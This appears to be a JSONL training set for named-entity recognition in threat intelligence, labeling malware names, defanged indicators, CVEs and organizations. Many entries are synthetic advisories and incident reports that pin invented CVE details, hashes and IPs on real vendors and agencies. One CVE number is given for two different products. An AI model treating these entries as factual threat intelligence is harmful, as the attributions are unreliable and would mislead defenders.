{"text": "It 's often hard for average users to know if their phones have been rooted , and Shedun apps often wait some period of time before displaying obtrusive ads or installing apps . The campaign 's use of an SMB worm to distribute WCry contributed to the ransomware 's virulence . APT33 : 64[.]251[.]19[.]216 [REDACTED][ . ]myftp[ . ]biz . Considering that both Royal and BlackSuit were active last month , however , a rebrand probably is n’t happening any time soon .", "spans": {"Malware: Shedun": [[82, 88]], "Indicator: 64.251.19.216": [[285, 304]], "Indicator: [REDACTED].myftp.biz": [[305, 333]], "Malware: Royal": [[358, 363]], "Malware: BlackSuit": [[368, 377]]}, "info": {"id": "cyberner_stix_train_002100", "source": "defanged_augment"}}
{"text": "The developers refer to this tool by the name Kazuar , which is a Trojan written using the Microsoft[ . ]NET Framework that offers actors complete access to compromised systems targeted by its operator .", "spans": {"Indicator: Microsoft.NET": [[91, 108]]}, "info": {"id": "dnrti_train_001585", "source": "defanged_augment"}}
{"text": "IOC Bulletin - DarkSide Campaign:\nNetwork Indicators:\n- 202 [ . ] 218 [ . ] 84 [ . ] 147\n- 203 [ . ] 94 [ . ] 193 [ . ] 98\n- 10[.]73[.]167[.]115\n- proxy-data[ . ]top\n- gatewayedge[ . ]live\nURLs:\n- hxxps://proxy-cdn[ . ]club/gate.php\n- hxxps://cloud-data[ . ]info/callback\nEmail Senders:\n- contact@identity-verify[ . ]cc\n- alert@phishing-domain[.]com\nFile Indicators:\n- SHA1: c60b0b49fa71b2818e9895b6561c4d5aee6f3c67\n- SHA1: 6aae40c1d8adc5d1c55382a063af98350c61fa1e\n- Drop path: /etc/cron.d/taskhost.exe", "spans": {"Malware: DarkSide": [[15, 23]], "Indicator: 202.218.84.147": [[56, 88]], "Indicator: 203.94.193.98": [[91, 122]], "Indicator: 10.73.167.115": [[125, 144]], "Indicator: proxy-data.top": [[147, 165]], "Indicator: gatewayedge.live": [[168, 188]], "Indicator: https://proxy-cdn.club/gate.php": [[197, 232]], "Indicator: https://cloud-data.info/callback": [[235, 271]], "Indicator: contact@identity-verify.cc": [[289, 319]], "Indicator: alert@phishing-domain.com": [[322, 349]], "Indicator: c60b0b49fa71b2818e9895b6561c4d5aee6f3c67": [[375, 415]], "Indicator: 6aae40c1d8adc5d1c55382a063af98350c61fa1e": [[424, 464]]}, "info": {"id": "synth_v2_01433", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-34807 is a critical command injection affecting Barracuda ESG. Proofpoint confirmed active exploitation by Salt Typhoon in the wild. Exploitation delivers DanaBot (MD5: 09ff5e82c135dfe8b268556361562a4f) which is dropped to /opt/app/bin/taskhost.exe. The exploit payload is hosted at hxxps://dataportal[.]top/collect and communicates to 10 [ . ] 103 [ . ] 8 [ . ] 72 for C2.", "spans": {"Vulnerability: CVE-2022-34807": [[24, 38]], "Vulnerability: command injection": [[53, 70]], "System: Barracuda ESG": [[81, 94]], "Organization: Proofpoint": [[96, 106]], "Malware: DanaBot": [[188, 195]], "Indicator: 09ff5e82c135dfe8b268556361562a4f": [[202, 234]], "Indicator: hxxps://dataportal.top/collect": [[316, 348]], "Indicator: 10.103.8.72": [[369, 398]]}, "info": {"id": "synth_v2_00715", "source": "defanged_augment"}}
{"text": "Artifact Analysis for SmokeLoader campaign:\nStage 1 dropper at /opt/app/bin/agent.py - SHA1: bc3596961e3c7d365d3e46e20a52b68e683361f9\nStage 2 loader at C:\\Users\\admin\\AppData\\Local\\Temp\\csrss.exe - SHA256: 839e132455cd1373f93bd1679955b0abdf6de865c08e35fcdaaa35d88ad90ae9\nFinal payload at /home/user/.config/beacon.dll - SHA1: d55c529b6dc988b95797fd47682c851fe2848e32\nExfiltration module - SHA1: b12f52d2d60e711afe4aca818a798910229bcb74\nAll stages communicated with 126 [ . ] 172 [ . ] 68 [ . ] 204. PsExec signatures detected in Stage 2.", "spans": {"Malware: SmokeLoader": [[22, 33]], "Indicator: bc3596961e3c7d365d3e46e20a52b68e683361f9": [[93, 133]], "Indicator: 839e132455cd1373f93bd1679955b0abdf6de865c08e35fcdaaa35d88ad90ae9": [[206, 270]], "Indicator: d55c529b6dc988b95797fd47682c851fe2848e32": [[326, 366]], "Indicator: b12f52d2d60e711afe4aca818a798910229bcb74": [[395, 435]], "Indicator: 126.172.68.204": [[465, 497]]}, "info": {"id": "synth_v2_01990", "source": "defanged_augment"}}
{"text": "The above code allows DealersChoice to load a second SWF object , specifically loading it with an argument that includes a C2 URL of “ hxxp://ndpmedia24[.]com/0pq6m4f.m3u8 ” .", "spans": {"Indicator: http://ndpmedia24.com/0pq6m4f.m3u8": [[135, 171]]}, "info": {"id": "cyberner_stix_train_005416", "source": "defanged_augment"}}
{"text": "CrowdStrike detected a multi-stage attack chain. The initial phishing email from helpdesk@account-update[ . ]xyz contained a link to hxxps://mailportal[ . ]online/wp-content/uploads/doc.php. This redirected to hxxps://apistorage[.]xyz/admin/config on update-cloud[ . ]online. A secondary email from admin@urgent-notice[ . ]online pointed to hxxp://backupcloud[ . ]cc/gate.php which delivered Vidar. The final payload callback was hxxps://node-auth[ . ]org/gate.php resolving to 10 [ . ] 131 [ . ] 49 [ . ] 209 via update-auth[ . ]com.", "spans": {"Organization: CrowdStrike": [[0, 11]], "Indicator: helpdesk@account-update.xyz": [[81, 112]], "Indicator: https://mailportal.online/wp-content/uploads/doc.php": [[133, 189]], "Indicator: https://apistorage.xyz/admin/config": [[210, 247]], "Indicator: update-cloud.online": [[251, 274]], "Indicator: admin@urgent-notice.online": [[299, 329]], "Indicator: hxxp://backupcloud.cc/gate.php": [[341, 375]], "Malware: Vidar": [[392, 397]], "Indicator: hxxps://node-auth.org/gate.php": [[430, 464]], "Indicator: 10.131.49.209": [[478, 509]], "Indicator: update-auth.com": [[514, 533]]}, "info": {"id": "synth_v2_01801", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-46178 is a critical cross-site scripting affecting SonicWall SMA. CrowdStrike confirmed active exploitation by Sandworm in the wild. Exploitation delivers Conti (SHA1: c91a653c5981c3859b73a4810be1749cf31983e8) which is dropped to /tmp/lsass.dmp. The exploit payload is hosted at hxxp://nodeapi[.]online/login and communicates to 59 [ . ] 63 [ . ] 111 [ . ] 196 for C2.", "spans": {"Vulnerability: CVE-2022-46178": [[24, 38]], "Vulnerability: cross-site scripting": [[53, 73]], "System: SonicWall SMA": [[84, 97]], "Organization: CrowdStrike": [[99, 110]], "Malware: Conti": [[188, 193]], "Indicator: c91a653c5981c3859b73a4810be1749cf31983e8": [[201, 241]], "Indicator: hxxp://nodeapi.online/login": [[312, 341]], "Indicator: 59.63.111.196": [[362, 393]]}, "info": {"id": "synth_v2_00829", "source": "defanged_augment"}}
{"text": "Subdomains at phmail[ . ]us have been linked to malicious activity dating back as far as December 2011 .", "spans": {"Indicator: phmail.us": [[14, 27]]}, "info": {"id": "dnrti_train_002198", "source": "defanged_augment"}}
{"text": "If the original SMS app has been restored , it will send “ the app returned to its original place. ” Controlling TrickMo TrickMo ’ s operators can control the malware via two channels : Through its C & C via a plaintext HTTP protocol using JSON objects Through encrypted SMS messages There are predefined commands to change the malware ’ s configuration and make it execute certain tasks . PUTTER PANDA is a determined adversary group , conducting intelligence-gathering operations targeting the Government , Defense , Research , and Technology sectors in the United States , with specific targeting of the US Defense and European satellite and aerospace industries . Symantec has found evidence of Starloader files being named AdobeUpdate[ . ]exe , AcrobatUpdate[.]exe , and INTELUPDATE[ . ]EXE among others .", "spans": {"Malware: TrickMo": [[113, 120], [121, 128]], "Organization: Government": [[496, 506]], "Organization: Defense": [[509, 516]], "Organization: Research": [[519, 527]], "Organization: Technology sectors": [[534, 552]], "Organization: US Defense": [[607, 617]], "Organization: satellite": [[631, 640]], "Organization: aerospace industries": [[645, 665]], "Organization: Symantec": [[668, 676]], "Indicator: Starloader files": [[699, 715]], "Indicator: AdobeUpdate.exe": [[728, 747]], "Indicator: AcrobatUpdate.exe": [[750, 769]], "Indicator: INTELUPDATE.EXE": [[776, 795]]}, "info": {"id": "cyberner_stix_train_000666", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2022-46178 is a critical authentication bypass affecting Palo Alto PAN-OS. Palo Alto Unit 42 confirmed active exploitation by Gamaredon in the wild. Exploitation delivers TrickBot (MD5: 089c8212c153466ee584086b545ee73e) which is dropped to /dev/shm/payload.bin. The exploit payload is hosted at hxxps://portalcache[.]io/callback and communicates to 10 [ . ] 150 [ . ] 72 [ . ] 199 for C2.", "spans": {"Vulnerability: CVE-2022-46178": [[24, 38]], "Vulnerability: authentication bypass": [[53, 74]], "System: Palo Alto PAN-OS": [[85, 101]], "Organization: Palo Alto Unit 42": [[103, 120]], "Malware: TrickBot": [[199, 207]], "Indicator: 089c8212c153466ee584086b545ee73e": [[214, 246]], "Indicator: hxxps://portalcache.io/callback": [[323, 356]], "Indicator: 10.150.72.199": [[377, 408]]}, "info": {"id": "synth_v2_00670", "source": "defanged_augment"}}
{"text": "Blog Post by Rapid7: Tracking UNC2452's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2025-37666 against Windows 11 deployments. The initial access vector involves spear-phishing emails from verify@account-update[.]xyz delivering RemcosRAT. Post-compromise, the attackers deploy Latrodectus and use Impacket for reconnaissance. C2 infrastructure includes 2 [ . ] 253 [ . ] 168 [ . ] 183 and cloudedge[ . ]link. A staging server at hxxp://mail-cloud[ . ]club/secure/token hosts additional tooling. Key artifact: C:\\Program Files\\Common Files\\loader.exe (SHA1: 7152a2dd386c6afb2d701303f4ed9e5f933540e5).", "spans": {"Organization: Rapid7": [[13, 19]], "Vulnerability: CVE-2025-37666": [[117, 131]], "System: Windows 11": [[140, 150]], "Indicator: verify@account-update.xyz": [[226, 253]], "Malware: RemcosRAT": [[265, 274]], "Malware: Latrodectus": [[314, 325]], "Indicator: 2.253.168.183": [[390, 421]], "Indicator: cloudedge.link": [[426, 444]], "Indicator: http://mail-cloud.club/secure/token": [[466, 505]], "Indicator: 7152a2dd386c6afb2d701303f4ed9e5f933540e5": [[594, 634]]}, "info": {"id": "synth_v2_01548", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Win32.Malachite.A W32.WLKSM.A1 Virus.WLKSM.Win32.1 Win32.Malachite.A Win32.Virus.MoonRover.a W32/Malachite.A Virus.Win32.MoonRover Virus.Win32.WLKSM.a Virus.Win32.Infector.dleseh Virus.Win32.WLKSM.AA BehavesLike[ . ]Win32[ . ]Virut[ . ]cc W32/Malachite.A Win32.Malachite.A Virus.Win32.WLKSM.a Win32.Malachite.A Win32.Malachite.A Win32.Malachite.A Virus.Win32.Wlksm.c", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virut.cc": [[226, 264]]}, "info": {"id": "cyner2_train_005899", "source": "defanged_augment"}}
{"text": "IOC Bulletin - Royal Campaign:\nNetwork Indicators:\n- 163[.]101[.]55[.]169\n- 10[.]128[.]175[.]33\n- 177 [ . ] 168 [ . ] 212 [ . ] 116\n- cache-storage[ . ]com\n- cdn-mail[.]site\nURLs:\n- hxxp://relay-api[.]org/secure/token\n- hxxps://backup-static[.]info/panel/index.html\nEmail Senders:\n- it@account-update[.]xyz\n- report@urgent-notice[.]online\nFile Indicators:\n- SHA1: ca3ff41f5d258f837c84eb0c2f474993d2c667a8\n- MD5: d1df35e334d24bab4e10c12bc5d57bbd\n- Drop path: /var/tmp/loader.exe", "spans": {"Malware: Royal": [[15, 20]], "Indicator: 163.101.55.169": [[53, 73]], "Indicator: 10.128.175.33": [[76, 95]], "Indicator: 177.168.212.116": [[98, 131]], "Indicator: cache-storage.com": [[134, 155]], "Indicator: cdn-mail.site": [[158, 173]], "Indicator: http://relay-api.org/secure/token": [[182, 217]], "Indicator: hxxps://backup-static.info/panel/index.html": [[220, 265]], "Indicator: it@account-update.xyz": [[283, 306]], "Indicator: report@urgent-notice.online": [[309, 338]], "Indicator: ca3ff41f5d258f837c84eb0c2f474993d2c667a8": [[364, 404]], "Indicator: d1df35e334d24bab4e10c12bc5d57bbd": [[412, 444]]}, "info": {"id": "synth_v2_01468", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan/W32.Zapchast.113152 Backdoor.KeyBoy Trojan.Zapchast.Win32.29227 Trojan.Heur.LP.EDDB38 Win32.Trojan.WisdomEyes.151026.9950.9999 Backdoor.Kboy Trojan.Win32.Zapchast.afhn Trojan.Win32.Zapchast.cjltha Win32.Trojan.Zapchast.Htcu BehavesLike[.]Win32[.]GameVance[.]ch Trojan/Zapchast.iik TR/Spy.113152.29 Trojan/Win32.Zapchast Backdoor.Win32.KeyBoy.113152[h] Win-Trojan/Keyboy.113152 Trojan.Win32.Zapchast.afhn Trojan.Zapchast!0ThicNhZU3g Trojan.Win32.Zapchast W32/Zapchast.AFHN!tr Win32/Trojan.020", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.GameVance.ch": [[257, 293]]}, "info": {"id": "cyner2_train_000343", "source": "defanged_augment"}}
{"text": "Android malware has drastically lower rates of success when app installations outside of Google Play are barred . Last week Microsoft , working together with Facebook , took strong steps to protect our customers and the internet from ongoing attacks by the Lazarus Group . APT33 : 162[.]250[.]145[.]222 [REDACTED][.]ddns[.]net . loop all over the string to execute the decoding operation .", "spans": {"System: Android": [[0, 7]], "System: Google Play": [[89, 100]], "Organization: Microsoft": [[124, 133]], "Organization: Facebook": [[158, 166]], "Indicator: 162.250.145.222": [[281, 302]], "Indicator: [REDACTED].ddns.net": [[303, 326]]}, "info": {"id": "cyberner_stix_train_001475", "source": "defanged_augment"}}
{"text": "The Android developer documentation describes the accessibility event class as a class that \" represents accessibility events that are seen by the system when something notable happens in the user interface . and as discovered later , even the U.S. and UK governments . ShadowHammer : hxxps://liveupdate01s[.]asus[.]com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip . Because phishing often leverages the impersonation of trusted associates from highlevel executives to legitimate vendors and partner organizations and includes personal details skimmed from social media or other publicly available information , its tempting to call them sophisticated .", "spans": {"System: Android": [[4, 11]], "Organization: governments": [[256, 267]], "Indicator: https://liveupdate01s.asus.com/pub/ASUS/nb/Apps_for_Win8/LiveUpdate/Liveupdate_Test_VER360.zip": [[285, 383]]}, "info": {"id": "cyberner_stix_train_007626", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 186 [ . ] 182 [ . ] 66 [ . ] 180, the CISA IR team identified BatLoader running as C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py. The threat actor, believed to be Sandworm, used Hashcat for credential harvesting and Seatbelt for lateral movement. Exfiltrated data was sent to update-cache[ . ]link and proxycache[ . ]live. The initial dropper (SHA1: cef1e7cc266b642d25f1a83551b8424ea7bc467b) was delivered via a phishing email from info@secure-verify[.]net. A second C2 node was observed at 172[.]208[.]51[.]129, with a persistence mechanism writing to C:\\Users\\admin\\Downloads\\payload.bin.", "spans": {"Indicator: 186.182.66.180": [[64, 96]], "Organization: CISA": [[102, 106]], "Malware: BatLoader": [[126, 135]], "Indicator: update-cache.link": [[337, 358]], "Indicator: proxycache.live": [[363, 382]], "Indicator: cef1e7cc266b642d25f1a83551b8424ea7bc467b": [[411, 451]], "Indicator: info@secure-verify.net": [[493, 517]], "Indicator: 172.208.51.129": [[552, 572]]}, "info": {"id": "synth_v2_00369", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: NSA identified a large-scale phishing operation. Emails originated from verify@mail-service[.]info and account@login-portal[.]tech, spoofing legitimate services. Victims were directed to hxxps://relay-cloud[ . ]club/callback which hosted a credential harvesting page on node-api[ . ]online. A secondary link hxxps://securecache[ . ]xyz/secure/token delivered WarmCookie (SHA256: dcaab862c474b782cecaba7df67958c94366c06a7a0b97718669bd903263a3de). The malware was saved to /home/user/.config/payload.bin and established C2 with 211[.]185[.]174[.]145.", "spans": {"Organization: NSA": [[26, 29]], "Indicator: verify@mail-service.info": [[98, 124]], "Indicator: account@login-portal.tech": [[129, 156]], "Indicator: hxxps://relay-cloud.club/callback": [[213, 250]], "Indicator: node-api.online": [[296, 315]], "Indicator: hxxps://securecache.xyz/secure/token": [[334, 374]], "Malware: WarmCookie": [[385, 395]], "Indicator: dcaab862c474b782cecaba7df67958c94366c06a7a0b97718669bd903263a3de": [[405, 469]], "Indicator: 211.185.174.145": [[552, 573]]}, "info": {"id": "synth_v2_01018", "source": "defanged_augment"}}
{"text": "Phishing Campaign Report: Cisco Talos identified a large-scale phishing operation. Emails originated from helpdesk@mail-service[ . ]info and verify@mail-service[ . ]info, spoofing legitimate services. Victims were directed to hxxps://secure-storage[ . ]xyz/admin/config which hosted a credential harvesting page on cdn-proxy[.]online. A secondary link hxxp://proxy-static[.]tech/api/v2/auth delivered Qbot (SHA1: 08de67f0dca5ccf4ec6354b9a03c7b5bb584b087). The malware was saved to C:\\Users\\admin\\Downloads\\chrome_helper.exe and established C2 with 90[.]31[.]115[.]108.", "spans": {"Organization: Cisco Talos": [[26, 37]], "Indicator: helpdesk@mail-service.info": [[106, 136]], "Indicator: verify@mail-service.info": [[141, 169]], "Indicator: hxxps://secure-storage.xyz/admin/config": [[226, 269]], "Indicator: cdn-proxy.online": [[315, 333]], "Indicator: http://proxy-static.tech/api/v2/auth": [[352, 390]], "Malware: Qbot": [[401, 405]], "Indicator: 08de67f0dca5ccf4ec6354b9a03c7b5bb584b087": [[413, 453]], "Indicator: 90.31.115.108": [[548, 567]]}, "info": {"id": "synth_v2_00983", "source": "defanged_augment"}}
{"text": "Incident Response Summary: On detection of anomalous traffic to 102[.]41[.]96[.]225, the Tenable IR team identified Conti running as C:\\Program Files\\Common Files\\chrome_helper.exe. The threat actor, believed to be Velvet Tempest, used Impacket for credential harvesting and Sharphound for lateral movement. Exfiltrated data was sent to nodeedge[.]top and cachebackup[ . ]club. The initial dropper (MD5: 812c81fa7bbec1f9dffb3f98e33d93ca) was delivered via a phishing email from noreply@mail-service[.]info. A second C2 node was observed at 43[.]218[.]129[.]178, with a persistence mechanism writing to C:\\Users\\Public\\Documents\\shell.php.", "spans": {"Indicator: 102.41.96.225": [[64, 83]], "Organization: Tenable": [[89, 96]], "Malware: Conti": [[116, 121]], "Indicator: nodeedge.top": [[337, 351]], "Indicator: cachebackup.club": [[356, 376]], "Indicator: 812c81fa7bbec1f9dffb3f98e33d93ca": [[404, 436]], "Indicator: noreply@mail-service.info": [[478, 505]], "Indicator: 43.218.129.178": [[540, 560]]}, "info": {"id": "synth_v2_00325", "source": "defanged_augment"}}
{"text": "A backdoor also known as: Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig!O Downloader.Small.28090 Trojan/Downloader.Harnig.al Win32.Trojan.WisdomEyes.16070401.9500.9939 Downloader.Trojan Win.Downloader.Small-579 Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan.Downloader.Harnig.al Trojan.Win32.Harnig.voqq Trojan.Win32.A.Downloader.10240.FS Troj.Downloader.W32.Harnig.al!c Trojan.Downloader.Harnig.al TrojWare.Win32.TrojanDownloader.Harnig.AL Trojan.Downloader.Harnig.al Trojan.DownLoader.919 Downloader.Harnig.Win32.353 BehavesLike[ . ]Win32[ . ]Cutwail[ . ]lt Trojan-Downloader.Win32.Harnig Trojan/Startpage.nv W32.Trojan.Downloader.Harnig Trojan[Downloader]/Win32.Harnig Trojan.Downloader.Harnig.al Trojan-Downloader.Win32.Harnig.al Trojan/Win32.Downloader.R39433 Trojan.Downloader.Harnig.al OScope.Downloader.GCLA Trj/Harnig.AD Win32/TrojanDownloader.Harnig.AL Win32.Trojan-downloader.Harnig.Sxyp Trojan.QHost.L W32/Harnig.AI!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Cutwail.lt": [[554, 594]]}, "info": {"id": "cyner2_train_007134", "source": "defanged_augment"}}
{"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind[ . ]exe . Paired with KillNet ’s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet ’s capabilities since the collective ’s inception in late 2021 .", "spans": {"Organization: Dell SecureWorks": [[192, 208]], "Indicator: hpqhvind.exe": [[418, 434]]}, "info": {"id": "cyberner_stix_train_004597", "source": "defanged_augment"}}
{"text": "Palo Alto Unit 42 published a threat intelligence report linking Granite Typhoon to a new campaign exploiting CVE-2020-16717 in Cisco ASA. The attackers deployed Emotet via LaZagne, establishing C2 communication with 10[.]28[.]102[.]69 and backup-cloud[ . ]link. A secondary payload was downloaded from hxxp://mail-relay[.]net/assets/js/payload.js. The malware binary (SHA1: 31de1c02f56ef5ec2512db09f71df92e84e8e098) was dropped to C:\\Users\\admin\\Desktop\\helper.sh. Phishing emails were sent from account@mail-service[.]info targeting enterprise users. A backup C2 server was identified at 172 [ . ] 128 [ . ] 74 [ . ] 215.", "spans": {"Organization: Palo Alto Unit 42": [[0, 17]], "Vulnerability: CVE-2020-16717": [[110, 124]], "System: Cisco ASA": [[128, 137]], "Malware: Emotet": [[162, 168]], "Indicator: 10.28.102.69": [[217, 235]], "Indicator: backup-cloud.link": [[240, 261]], "Indicator: hxxp://mail-relay.net/assets/js/payload.js": [[303, 347]], "Indicator: 31de1c02f56ef5ec2512db09f71df92e84e8e098": [[375, 415]], "Indicator: account@mail-service.info": [[497, 524]], "Indicator: 172.128.74.215": [[590, 622]]}, "info": {"id": "synth_v2_00144", "source": "defanged_augment"}}
{"text": "SentinelOne published a threat intelligence report linking Gamaredon to a new campaign exploiting CVE-2021-24446 in Atlassian Confluence. The attackers deployed Play via Brute Ratel, establishing C2 communication with 192[.]99[.]113[.]201 and apinode[ . ]site. A secondary payload was downloaded from hxxps://proxy-storage[ . ]cc/admin/config. The malware binary (MD5: cb214460df2524d9f2d95ffb3ebec031) was dropped to C:\\Users\\admin\\Desktop\\payload.bin. Phishing emails were sent from contact@auth-check[ . ]org targeting enterprise users. A backup C2 server was identified at 51 [ . ] 11 [ . ] 42 [ . ] 138.", "spans": {"Organization: SentinelOne": [[0, 11]], "Vulnerability: CVE-2021-24446": [[98, 112]], "System: Atlassian Confluence": [[116, 136]], "Malware: Play": [[161, 165]], "Indicator: 192.99.113.201": [[218, 238]], "Indicator: apinode.site": [[243, 259]], "Indicator: hxxps://proxy-storage.cc/admin/config": [[301, 342]], "Indicator: cb214460df2524d9f2d95ffb3ebec031": [[369, 401]], "Indicator: contact@auth-check.org": [[485, 511]], "Indicator: 51.11.42.138": [[577, 607]]}, "info": {"id": "synth_v2_00238", "source": "defanged_augment"}}
{"text": "The BlackCat ransomware, also tracked as ALPHV, deployed a new variant in 2024 targeting VMware ESXi hypervisors. The Linux variant with SHA1 hash 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b was designed to encrypt virtual machine disk files on ESXi hosts. The attack began with exploitation of CVE-2024-37085 in VMware ESXi to gain administrative access. The threat actor used SSH to connect to ESXi hosts from 172[.]16[.]45[.]3 and uploaded the ransomware to /tmp/esxi_encrypt. The ransomware configuration was stored at /tmp/.config.json. Exfiltration of sensitive data occurred via rclone to Mega cloud storage, with traffic routed through 185 [ . ] 174 [ . ] 137 [ . ] 92. Additional SHA256 hashes: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5 and a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1. C2 communications used the domain alphv-paymentsite[ . ]onion.", "spans": {"Malware: BlackCat": [[4, 12]], "Malware: ALPHV": [[41, 46]], "System: VMware ESXi": [[89, 100], [310, 321]], "Indicator: 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b": [[147, 187]], "Vulnerability: CVE-2024-37085": [[292, 306]], "Indicator: 172.16.45.3": [[409, 426]], "Indicator: 185.174.137.92": [[641, 673]], "Indicator: d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0c1d2e3f4a5b6c7d8e9f0a1b2c3d4e5": [[701, 765]], "Indicator: a0b1c2d3e4f5a6b7c8d9e0f1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b1": [[770, 834]], "Indicator: alphv-paymentsite.onion": [[870, 897]]}, "info": {"id": "malware_00019", "source": "defanged_augment"}}
{"text": "Vulnerability Advisory: CVE-2023-27691 is a critical heap overflow affecting F5 BIG-IP. Europol confirmed active exploitation by Granite Typhoon in the wild. Exploitation delivers Dridex (SHA256: 0315dab475e280e354e79c3b6b7d98d58054aa0e093ee3fe03a3984a162b025a) which is dropped to C:\\Users\\admin\\Desktop\\backdoor.elf. The exploit payload is hosted at hxxp://loginsync[.]site/login and communicates to 172[.]53[.]140[.]215 for C2.", "spans": {"Vulnerability: CVE-2023-27691": [[24, 38]], "Vulnerability: heap overflow": [[53, 66]], "System: F5 BIG-IP": [[77, 86]], "Organization: Europol": [[88, 95]], "Malware: Dridex": [[180, 186]], "Indicator: 0315dab475e280e354e79c3b6b7d98d58054aa0e093ee3fe03a3984a162b025a": [[196, 260]], "Indicator: hxxp://loginsync.site/login": [[352, 381]], "Indicator: 172.53.140.215": [[402, 422]]}, "info": {"id": "synth_v2_00767", "source": "defanged_augment"}}
{"text": "AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. Prior to 0.6.1, AutoGPT allows of leakage of cross-domain cookies and protected headers in requests redirect. AutoGPT uses a wrapper around the requests python library, located in autogpt_platform/backend/backend/util/request.py. In this wrapper, redirects are specifically NOT followed for the first request. If the wrapper is used with allow_redirects set to True (which is the default), any redirect is not followed by the initial request, but rather re-requested by the wrapper using the new location. However, there is a fundamental flaw in manually re-requesting the new location: it does not account for security-sensitive headers which should not be sent cross-origin, such as the Authorization and Proxy-Authorization header, and cookies. For example in autogpt_platform/backend/backend/blocks/github/_api.py, an Authorization header is set when retrieving data from the GitHub API. However, if GitHub suffers from an open redirect vulnerability (such as the made-up example of hxxps://api[ . ]github[ . ]com/repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=hxxps://joshua.hu/), and the script can be coerced into visiting it with the Authorization header, the GitHub credentials in the Authorization header will be leaked. This allows leaking auth headers and private cookies. This vulnerability is fixed in 0.6.1.", "spans": {"Indicator: https://api.github.com/repos/{owner}/{repo}/issues/comments/{comment_id}/../../../../../redirect/?url=https://joshua.hu/": [[1132, 1260]], "Organization: GitHub": [[1025, 1031], [1049, 1055], [1345, 1351]], "Vulnerability: open redirect": [[1072, 1085]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-31491"}}
{"text": "Malware Analysis Report: Emotet (SHA256: 6e5e20d1fead7fe9f9fda50776850e5e04600198a5d74b4077cd412109504e27). Upon execution on Ivanti Connect Secure, the sample creates C:\\Program Files\\Common Files\\lsass.dmp and injects into legitimate processes. Network analysis shows beaconing to 54[.]34[.]30[.]194 every 60 seconds and DNS queries to loginlogin[ . ]online. The second stage was fetched from hxxp://data-portal[ . ]link/admin/config and written to /tmp/helper.sh. The payload uses Covenant-style techniques for defense evasion. A secondary hash (MD5: f6fe795a70dbfe4be1a038f33c21a2ae) was extracted from the unpacked payload.", "spans": {"Malware: Emotet": [[25, 31]], "Indicator: 6e5e20d1fead7fe9f9fda50776850e5e04600198a5d74b4077cd412109504e27": [[41, 105]], "System: Ivanti Connect Secure": [[126, 147]], "Indicator: 54.34.30.194": [[283, 301]], "Indicator: loginlogin.online": [[338, 359]], "Indicator: hxxp://data-portal.link/admin/config": [[395, 435]], "Indicator: f6fe795a70dbfe4be1a038f33c21a2ae": [[554, 586]]}, "info": {"id": "synth_v2_00505", "source": "defanged_augment"}}
{"text": "Blog Post by NSA: Tracking APT29's Latest Operations. Our research team has uncovered a new campaign leveraging CVE-2022-40108 against Apache Struts deployments. The initial access vector involves spear-phishing emails from support@identity-verify[.]cc delivering Vidar. Post-compromise, the attackers deploy Royal and use LinPEAS for reconnaissance. C2 infrastructure includes 172[.]48[.]46[.]153 and synccdn[ . ]link. A staging server at hxxps://secureproxy[ . ]io/panel/index.html hosts additional tooling. Key artifact: /tmp/chrome_helper.exe (SHA1: ef454b124e0163623f8223e1014c400250e8147d).", "spans": {"Organization: NSA": [[13, 16]], "Vulnerability: CVE-2022-40108": [[112, 126]], "System: Apache Struts": [[135, 148]], "Indicator: support@identity-verify.cc": [[224, 252]], "Malware: Vidar": [[264, 269]], "Malware: Royal": [[309, 314]], "Indicator: 172.48.46.153": [[378, 397]], "Indicator: synccdn.link": [[402, 418]], "Indicator: hxxps://secureproxy.io/panel/index.html": [[440, 483]], "Indicator: ef454b124e0163623f8223e1014c400250e8147d": [[554, 594]]}, "info": {"id": "synth_v2_01592", "source": "defanged_augment"}}
